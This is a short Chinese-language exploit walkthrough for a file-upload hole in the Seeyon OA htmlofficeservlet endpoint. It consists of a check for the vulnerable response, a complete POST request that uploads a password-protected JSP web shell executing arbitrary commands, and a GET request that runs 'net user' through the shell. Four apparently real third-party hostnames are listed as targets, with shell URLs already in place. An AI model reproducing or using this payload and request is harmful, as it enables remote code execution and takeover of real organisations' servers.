/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net user

htmlofficeservlet

http://oa.kongsun.com:8000/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net%20user
http://oa.clrcn.com:88/seeyon//test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net%20user
http://xxzx.dfsy.com.cn:8082/seeyon//test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net%20user
http://www.jy-tz.com:8081/seeyon//test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net%20user

1、判断是否允许访问http://oa.clrcn.com:88/seeyon/htmlofficeservlet出现

DBSTEP V3.0     0               21              0               htmoffice operate err
证明存在漏洞

2、构造POST请求包上传木马文件：

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host:oa.clrcn.com:88
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

3、使用get请求木马文件带命令即可实现代码执行：http://xxzx.dfsy.com.cn:8082/seeyon//test123456.jsp?pwd=asasd3344&cmd=cmd+/c+net%20user
